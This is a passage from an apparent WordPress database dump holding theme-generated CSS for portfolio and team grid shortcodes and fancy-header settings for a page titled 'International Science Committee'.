a,\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .filter a * {\r\n  color: ;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .paginator a,\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .paginator a * {\r\n  color: ;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .filter-bg-decoration .filter-categories a.act {\r\n  color: #fff;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.mode-masonry) article {\r\n  margin-top: ;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.mode-masonry) article:first-of-type,\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.mode-masonry) article.visible.first {\r\n  margin-top: 0;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.dividers-on:not(.mode-masonry) article {\r\n  margin-top: 0;\r\n  padding-top: ;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.dividers-on:not(.mode-masonry) article:first-of-type,\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.dividers-on:not(.mode-masonry) article.visible.first {\r\n  margin-top: 0;\r\n  padding-top: 0;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.hover-scale article:after {\r\n  background: ;\r\n  background: -webkit-linear-gradient();\r\n  background: linear-gradient();\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.gradient-overlay-layout-list article {\r\n  border-radius: 0px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-thumbnail-wrap {\r\n  padding: 20px 20px 0px 20px;\r\n  border-radius: 0px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-thumbnail-wrap *,\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-thumbnail-rollover:after {\r\n  border-radius: 0px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.enable-bg-rollover .post-thumbnail-rollover:after {\r\n  background: ;\r\n  background: -webkit-linear-gradient();\r\n  background: linear-gradient();\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.gradient-overlay-layout-list) .post-thumbnail {\r\n  box-shadow: \"\";\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.gradient-overlay-layout-list article {\r\n  box-shadow: \"\";\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.gradient-overlay-layout-list) .post-thumbnail {\r\n  box-shadow: \"\";\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.gradient-overlay-layout-list article {\r\n  box-shadow: \"\";\r\n}\r\n.bottom-overlap-layout-list.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container {\r\n  height: calc(100% - 100px);\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a {\r\n  width: 44px;\r\n  height: 44px;\r\n  line-height: 44px;\r\n  border-radius: 100px;\r\n  margin: 10px 5px 10px;\r\n}\r\n.content-rollover-layout-list:not(.content-align-center).portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a,\r\n.gradient-overlay-layout-list:not(.content-align-center).portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a {\r\n  margin: 10px 10px 10px 0;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a:before,\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a:after {\r\n  border-width: 0px;\r\n}\r\n.dt-icon-bg-on.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a:before {\r\n  background: rgba(255,255,255,0.3);\r\n  -webkit-box-shadow: none;\r\n  box-shadow: none;\r\n}\r\n.dt-icon-hover-bg-on.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a:after {\r\n  background: rgba(255,255,255,0.5);\r\n  -webkit-box-shadow: none;\r\n  box-shadow: none;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a > span:before {\r\n  font-size: 16px;\r\n  line-height: 44px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a:not(:hover) > span {\r\n  color: #ffffff;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a:hover > span {\r\n  color: #ffffff;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .entry-title,\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.owl-carousel .entry-title {\r\n  margin-bottom: 5px;\r\n  font-size: 22px;\r\n  line-height: 32px;\r\n  font-style: ;\r\n  font-weight: bold;\r\n  text-transform: ;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .entry-meta {\r\n  margin-bottom: 15px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .entry-meta * {\r\n  font-style: ;\r\n  font-weight: ;\r\n  text-transform: ;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .portfolio-categories {\r\n  margin-bottom: 15px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .entry-excerpt {\r\n  margin-bottom: 5px;\r\n  font-style: ;\r\n  font-weight: ;\r\n  text-transform: ;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.centered-layout-list) .post-entry-content {\r\n  padding: 20px 30px 30px 30px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.centered-layout-list):not(.content-bg-on):not(.mode-list) .no-img .post-entry-content {\r\n  padding: 0;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-bg-on:not(.classic-layout-list):not(.centered-layout-list):not(.gradient-overlay-layout-list) .post-entry-content {\r\n  background: #f7f7f7;\r\n  -webkit-box-shadow: none;\r\n  box-shadow: none;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.gradient-overlay-layout-list .post-entry-content {\r\n  border-radius: 0px;\r\n}\r\n@media screen and (max-width: ) {\r\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 article {\r\n    -webkit-flex-flow: column nowrap;\r\n    -moz-flex-flow: column nowrap;\r\n    -ms-flex-flow: column nowrap;\r\n    flex-flow: column nowrap;\r\n    margin-top: 20px;\r\n  }\r\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.dividers-on article {\r\n    border: none;\r\n  }\r\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-bg-on.centered-layout-list article {\r\n    padding: 0;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-thumbnail-wrap,\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-entry-content {\r\n    width: 100%;\r\n    margin: 0;\r\n    top: 0;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-thumbnail-wrap {\r\n    padding: 0;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-entry-content:after {\r\n    display: none;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-even .post-thumbnail-wrap,\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.centered-layout-list .post-thumbnail-wrap {\r\n    -webkit-order: 0;\r\n    -moz-order: 0;\r\n    -ms-flex-order: 0;\r\n    order: 0;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.centered-layout-list .post-entry-title-content {\r\n    -webkit-order: 1;\r\n    -moz-order: 1;\r\n    -ms-flex-order: 1;\r\n    order: 1;\r\n    width: 100%;\r\n    padding: 20px 20px 0;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.centered-layout-list .post-entry-content {\r\n    -webkit-order: 2;\r\n    -moz-order: 2;\r\n    -ms-flex-order: 2;\r\n    order: 2;\r\n    padding-top: 0;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-entry-content {\r\n    padding: 20px;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .entry-title {\r\n    margin: 3px 0 5px;\r\n    font-size: 20px;\r\n    line-height: 26px;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .entry-meta {\r\n    margin: 5px 0 5px;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .entry-excerpt {\r\n    margin: 15px 0 0;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-details {\r\n    margin: 5px 0 10px;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-details.details-type-link {\r\n    margin-bottom: 2px;\r\n  }\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.resize-by-browser-width) .dt-css-grid {\r\n  grid-row-gap: 30px;\r\n  grid-column-gap: 30px;\r\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.resize-by-browser-width) .dt-css-grid .double-width {\r\n  grid-column: span 2;\r\n}\r\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.resize-by-browser-width) .dt-css-grid,\r\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.resize-by-browser-width) .dt-css-grid {\r\n  display: flex;\r\n  flex-flow: row wrap;\r\n  margin: -15px;\r\n}\r\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\r\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\r\n  flex: 1 0 ;\r\n  min-width: ;\r\n  max-width: 100%;\r\n  padding: 15px;\r\n  box-sizing: border-box;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid {\r\n  grid-template-columns: repeat(3,1fr);\r\n  grid-template-rows: auto;\r\n  grid-column-gap: 30px;\r\n  grid-row-gap: 30px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .double-width {\r\n  grid-column: span 2;\r\n}\r\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid {\r\n  margin: -15px;\r\n}\r\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell {\r\n  width: 33.333333333333%;\r\n  padding: 15px;\r\n}\r\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\r\n  width: calc(33.333333333333%) * 2;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width:not(.centered-layout-list):not(.content-bg-on) .dt-css-grid {\r\n  grid-row-gap: 0px;\r\n}\r\n@media screen and (max-width: 1199px) {\r\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid {\r\n    grid-template-columns: repeat(3,1fr);\r\n  }\r\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell,\r\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell {\r\n    width: 33.333333333333%;\r\n  }\r\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\r\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\r\n    width: calc(33.333333333333%)*2;\r\n  }\r\n}\r\n@media screen and (max-width: 991px) {\r\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid {\r\n    grid-template-columns: repeat(2,1fr);\r\n  }\r\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell,\r\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell {\r\n    width: 50%;\r\n  }\r\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\r\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\r\n    width: calc(50%)*2;\r\n  }\r\n}\r\n@media screen and (max-width: 767px) {\r\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid {\r\n    grid-template-columns: repeat(1,1fr);\r\n  }\r\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell,\r\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell {\r\n    width: 100%;\r\n  }\r\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\r\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\r\n    width: calc(100%)*2;\r\n  }\r\n}\r\n'),
(15770,2876,'_the7_imported_item','software-company'),
(15772,2876,'_dt_microsite_primary_menu','5'),
(15773,2876,'_dt_microsite_split_left_menu','5'),
(15774,2876,'_dt_microsite_split_right_menu','5'),
(15775,2876,'_dt_microsite_mobile_menu','5'),
(15776,2876,'_dt_page_overrides_right_margin',''),
(15777,2876,'_dt_page_overrides_left_margin',''),
(15778,2876,'_dt_mobile_page_padding_top',''),
(15779,2876,'_dt_mobile_page_padding_right',''),
(15780,2876,'_dt_mobile_page_padding_bottom',''),
(15781,2876,'_dt_mobile_page_padding_left',''),
(15782,2876,'_thumbnail_id','3299'),
(15783,2876,'_dt_fancy_header_layout_heading',''),
(15784,2876,'_dt_fancy_header_title_aligment','center'),
(15785,2876,'_dt_fancy_header_height','300'),
(15786,2876,'_dt_fancy_header_padding-top','0px'),
(15787,2876,'_dt_fancy_header_padding-bottom','0px'),
(15788,2876,'_dt_fancy_header_breadcrumbs_heading',''),
(15789,2876,'_dt_fancy_header_breadcrumbs','disabled'),
(15790,2876,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(15791,2876,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(15792,2876,'_dt_fancy_header_title_heading',''),
(15793,2876,'_dt_fancy_header_title_mode','custom'),
(15794,2876,'_dt_fancy_header_title','International Science Committee'),
(15795,2876,'_dt_fancy_header_title_font_size','50'),
(15796,2876,'_dt_fancy_header_title_line_height','36'),
(15797,2876,'_dt_fancy_header_text_transform','uppercase'),
(15798,2876,'_dt_fancy_header_title_color_mode','color'),
(15799,2876,'_dt_fancy_header_title_color','#ffffff'),
(15800,2876,'_dt_fancy_header_subtitle_heading',''),
(15801,2876,'_dt_fancy_header_subtitle',''),
(15802,2876,'_dt_fancy_header_subtitle_font_size','18'),
(15803,2876,'_dt_fancy_header_subtitle_line_height','26'),
(15804,2876,'_dt_fancy_header_subtitle_text_transform','none'),
(15805,2876,'_dt_fancy_header_subtitle_color_mode','color'),
(15806,2876,'_dt_fancy_header_subtitle_color','#ffffff'),
(15807,2876,'_dt_fancy_header_bg_heading',''),
(15808,2876,'_dt_fancy_header_bg_color','#222222'),
(15809,2876,'_dt_fancy_header_bg_image_origin','featured_image'),
(15810,2876,'_dt_fancy_header_bg_image','a:0:{}'),
(15811,2876,'_dt_fancy_header_bg_repeat','no-repeat'),
(15812,2876,'_dt_fancy_header_bg_position_x','center'),
(15813,2876,'_dt_fancy_header_bg_position_y','center'),
(15814,2876,'_dt_fancy_header_bg_fullscreen','1'),
(15815,2876,'_dt_fancy_header_bg_overlay','0'),
(15816,2876,'_dt_fancy_header_overlay_color','#000'),
(15817,2876,'_dt_fancy_header_bg_overlay_opacity','50'),
(15818,2876,'_dt_fancy_header_scroll_effect','default'),
(15819,2876,'_dt_fancy_header_bg_parallax','0.5'),
(15820,2876,'_dt_fancy_header_responsiveness_heading',''),
(15821,2876,'_dt_fancy_header_responsiveness','enabled'),
(15822,2876,'_dt_fancy_header_responsiveness_switch','778px'),
(15823,2876,'_dt_fancy_header_responsive_height','70'),
(15824,2876,'_dt_fancy_header_responsive_font_size','30'),
(15825,2876,'_dt_fancy_header_responsive_title_line_height','38'),
(15826,2876,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(15827,2876,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(15828,2876,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(15829,2876,'the7_fancy_title_css','.fancy-header {\n  background-image: url(\'https://gsw2023.com/wp-content/uploads/2022/11/pexels-nicole-avagliano-2706654-scaled.jpg\');\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 50px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: uppercase;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(15830,2876,'_dp_original','2372'),
(15831,2876,'_edit_lock','1675494747:1'),
(15832,2876,'_edit_last','1'),
(15840,2898,'_dp_original','2876'),
(15841,2898,'the7_shortcodes_dynamic_css','a:1:{s:32:\"78412dbe2aa1160dfb1540f02e3d1c99\";s:6508:\".dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99 .team-desc {\n  padding: 20px 20px 20px 20px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99 .team-author-name,\n.dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99 .team-author-name a {\n  margin-bottom: 0px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99 .team-author p {\n  margin-bottom: 10px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99  .team-media {\n  padding: 0px 0px 0px 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99 .dt-css-grid .team-media img {\n  max-width: 100%;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99 .team-content {\n  margin-bottom: 5px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99  .team-media,\n.dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99  .team-media a.rollover,\n.dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99  .team-media a.rollover *,\n.dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99  .team-media img {\n  border-radius: 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99 .soc-ico {\n  margin-bottom: 15px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99 .soc-ico a {\n  min-width: 26px;\n  min-height: 26px;\n  font-size: 16px;\n  border-radius: 100px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99 .soc-ico a:not(:last-child) {\n  margin-right: 4px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99 .soc-ico a:before,\n.dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99 .soc-ico a:after {\n  min-width: 26px;\n  min-height: 26px;\n  padding: inherit;\n}\n.dt-icon-border-on.dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99 .soc-ico a:before {\n  border: 0px solid transparent;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99 .soc-ico a:hover {\n  font-size: 16px;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99 .soc-ico a:hover .soc-font-icon {\n  color: rgba(255,255,255,0.75);\n  background: none;\n}\n.dt-icon-border-hover-on.dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99 .soc-ico a:after {\n  border: 0px solid transparent;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99 .soc-ico a:not(:hover) .soc-font-icon {\n  color: #ffffff;\n  background: none;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99 .soc-ico a .soc-font-icon {\n  font-size: 16px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99 .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99.resize-by-browser-width .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99.resize-by-browser-width .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n@media screen and (max-width: 1199px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n}\n@media screen and (max-width: 991px) {\n  